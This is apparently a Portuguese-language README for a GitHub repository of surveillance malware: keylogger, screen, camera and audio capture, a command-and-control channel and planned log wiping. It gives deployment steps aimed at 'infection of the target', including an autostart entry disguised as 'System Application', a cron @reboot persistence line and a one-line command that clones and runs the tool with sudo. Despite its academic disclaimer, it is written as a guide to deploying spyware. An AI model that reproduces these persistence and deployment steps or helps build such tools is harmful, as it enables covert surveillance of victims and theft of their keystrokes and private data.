O objetivo deste repositório é puramente acadêmico e todas as informações e códigos aqui fornecidos devem ser usados apenas para fins educacionais e de aprendizado. É crucial ressaltar que qualquer uso inadequado e/ou ilícito dessas informações é estritamente proibido. Portanto, algumas funcionalidades estão sendo mascaradas para evitar o uso indevido e/ou malicioso desse material.
🔒🔍📊🔑🌐🛡️🔬🚀⛓️🕵️♂️ Meu nome é Efraim Lima e sou um entusiasta da cibersegurança, mergulhando em um campo fascinante que é amplamente discutido devido às inúmeras situações em que a falta de medidas de segurança adequadas tem causado complicações significativas tanto para indivíduos quanto para empresas. Meu foco de estudo está voltado para a inteligência em segurança cibernética, resposta a incidentes e espionagem.
Se você está interessado em saber mais sobre os conceitos, trocar ideias ou contribuir com o projeto, sinta-se à vontade para entrar em contato comigo através do LinkedIn. Acredito que o compartilhamento de conhecimento é essencial para o avanço da segurança cibernética. 👥
🔒🔍📊🔑🌐🛡️🔬🚀⛓️🕵️♂️
- 👨💼 Embora eu não tenha experiência direta na área de cibersegurança, adquiri conhecimentos sobre diversas técnicas, especialmente na área de inteligência em segurança cibernética e resposta a incidentes;
- 🚀 Estou constantemente buscando aprender novas tecnologias e práticas relacionadas à segurança cibernética;
- 🔍 Tenho interesse particular no estudo do desenvolvimento de malwares, como Trojans, Spywares e Worms, bem como nos processos de Command & Control (C&C) que permitem o controle desses malwares;
- ⛓️ Tenho conhecimento sobre a Kill Chain, uma estrutura que descreve as etapas pelas quais um ataque cibernético passa, desde o reconhecimento inicial até a exfiltração de dados e o impacto no alvo.
Este repositório contém alguns projetos e scripts relacionados à segurança cibernética, incluindo:
-
📁
instalação: O projeto procura automatizar todo processo de instalação em um host para minimizar o trabalho durante o momento de infecção do alvo. Dessa forma o tempo para início da ação de reconhecimento é reduzido; -
⚙️
command & control (C2): O objetivo dessa etapa é estabelecer uma porta aberta e sempre disponível para que o atacante possa enviar comandos via CLI de maneira remota para a máquina alvo, proporcionando maior flexibilidade para um reconhecimento mais estruturado e pleno; -
🖥️
screen: O pretexto da existencia dessa ferramenta é capturar a tela do usuário e armazenar pequenos volumes de vídeo dessa captura em um banco de dados para analisar posteriormete; junto a função de capturar a tela temos outra que pretende capturar o audio que sairia do device, mas ainda não foi completamente testado. -
🕵️♂️
spyware: Todo o projeto funciona como um spyware, capturando informações do alvo e armazenando em um banco de dados; -
⌨️
keylogger: Este projeto mostra a implementação de um keylogger, uma ferramenta que registra todas as teclas pressionadas em um sistema. Em minha funcionalidade do keylogger também implementei uma função de analise das palavras que será muito útil posteriormente para analisar palavras repetidas capturadas e elencar por prioridade. -
📷
captura de imagens: Exploro também a captura de fotos e vídeos da câmera, com o objetivo de compilar informações visuais para analise posterior. Este módulo ainda não comporta inibição da ativação do led das câmeras; -
🎤
audio: Aqui estudo como poderia capturar o audio da máquina, de maneira a compreender que este tipo de funcionalidade poderia passar desapercebida pelo sistema por não acionar funcionalidades extras, mas digo isso apenas neste projeto e em analises preeliminares. Caso venha disfarçado de um trojan seria de difícil detecção; -
📊
logs: Na parte de analise de logs procuro catalogar todo e qualquer tipo de alteração no sistema, assim como: arquivos alterados, aplicações (iniciação, fechamento e suspensão), eventos de inicialização e modificação de aplicações; -
🌐
rede: No quesito redes temos um módulo chamado "network" que analisa todas portas abertas na rede local, avalia qual serviçõ está em execução naquela interface, procura sua pasta origem e analisa cada arquivo nesse diretório gerando o hash dao arquivo e comparando com provedores de antivirus através da conexão de uma API; -
🗑️
trash: Concluo limpando automaticamente todos arquivos que foram deletados durante as varreduras para não sobrecarregar ainda mais o host alvo. Futuramente a meta é conseguir apagar rastros no sistema assim como logs, portas abertas e históricos;
Antes de começar, certifique-se de ter os seguintes requisitos instalados em seu sistema:
- Git
- Python 3
- pip
- virtualenv
Você pode verificar se esses requisitos estão instalados executando os seguintes comandos:
git --version
python3 --version
pip3 --version
virtualenv --version
Caso algum dos requisitos não esteja instalado, você pode instalá-lo usando o gerenciador de pacotes apropriado para o seu sistema.
Para começar, abra um terminal e execute o seguinte comando para clonar o repositório:
git clone https://github.com/efraim-lima/malwares /chrome
**
Se você estiver usando um Chromebook, pode habilitar o modo de desenvolvedor usando o seguinte procedimento:
1 - Desligue o Chromebook.
2 - Pressione e segure as teclas Esc + Refresh (normalmente é a quarta tecla na fileira superior com uma seta circular) no teclado.
3 - Enquanto mantém essas teclas pressionadas, pressione o botão de ligar para ligar o Chromebook.
4 - Solte as teclas quando você ver a tela de recuperação.
5 - A partir daqui, use as teclas de seta para navegar até as opções avançadas e pressione Enter.
6 - Na próxima tela, selecione 'Enable Developer Mode' e pressione Enter.
7 - Na última tela, pressione 'Confirm'.
**
Agora, vamos instalar o Python e as dependências necessárias para a aplicação. Execute os seguintes comandos:
sudo apt update
sudo apt install -y git python3 python3-pip python3-venv
Para isolar a instalação das dependências, vamos criar e ativar um ambiente virtual. Execute os seguintes comandos:
python3 -m venv /caminho/para/sua_aplicacao/venv
source /caminho/para/sua_aplicacao/venv/bin/activate
Agora, vamos instalar as dependências do arquivo requirements.txt. Execute o seguinte comando:
pip install -r /caminho/para/sua_aplicacao/requirements-linux.txt
Finalmente, podemos executar a aplicação. Execute o seguinte comando:
python3 /caminho/para/sua_aplicacao/modules/play.py
Caso deseje que a aplicação seja iniciada automaticamente com o sistema, você pode seguir os seguintes passos:
1 - Crie um arquivo "malwares.desktop" no diretório "/home/seu_usuario/.config/autostart/", substituindo "seu_usuario" pelo seu nome de usuário.
2 - Adicione o seguinte conteúdo ao arquivo:
[Desktop Entry]
Type=Application
Exec=/caminho/para/sua_aplicacao/venv/bin/python3 /caminho/para/sua_aplicacao/modules/play.py
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true
Name[en_US]=My Python App
Name=My Python App
Comment[en_US]=System Application
Comment=System Application3 - Defina as permissões corretas para o arquivo:
chmod +x /home/seu_usuario/.config/autostart/My_Python_App.desktop
4 - Tornar o script play.py persistente com cron:
(crontab -l 2>/dev/null; echo "@reboot /tools/play.py") | crontab -
Agora, sua aplicação está instalada e pronta para ser executada. Certifique-se de seguir todos os passos corretamente para garantir o funcionamento adequado da aplicação em seu sistema.
A estrutura do código neste repositório é organizada da seguinte maneira:
- root │ autostart.user.js │ C2.py │ create_requirements.py │ duckyscript.sh │ play.py │ start.service │ start_chrome.sh │ start_darwin.sh │ start_linux.sh │ start_windows.bat │ taping.txt │ init.py │ ├───modules │ │ analysis.py │ │ audio.py │ │ camera.py │ │ config.txt │ │ cpu.py │ │ database.py │ │ data_collection.py │ │ images.py │ │ installer.py │ │ keyboards.py │ │ logs.py │ │ network.py │ │ packets.py │ │ screens.py │ │ system.py │ │ tapingII.txt │ │ trash.py │ │ videos.py │ │ init.py │ │ │ ├───CNC │ │ C2.py │ │ CNC.py │ │ CNC.sh │ │ CNC_chrome.sh │ │ CNC_chromeII.sh │ │ CNC_darwin.sh │ │ CNC_linux.sh │ │ CNC_remote.sh │ │ CNC_windows.bat │ │ commandandcontrol.py │ │ SSH.sh │ │ teste.sh │ │ │ ├───logs │ │ file_logs.txt │ │ system_logs.txt │ │ │ └───__pycache__ │ audio.cpython-311.pyc │ database.cpython-311.pyc │ images.cpython-311.pyc │ logs.cpython-311.pyc │ init.cpython-311.pyc │ └───olds audio_alternate.py commandandcontrol.py logs_full.py teste.py testeII.py trojan.py video_path.py
Para quem deseja iniciar toda a aplicação em um único comando usado no terminal, basta digitar:
sudo apt install -y git && cd "$HOME" && git clone https://www.github.com/efraim-lima/malwares && cd "$HOME"/malwares/tools && chmod +x start.sh && sudo ./start.sh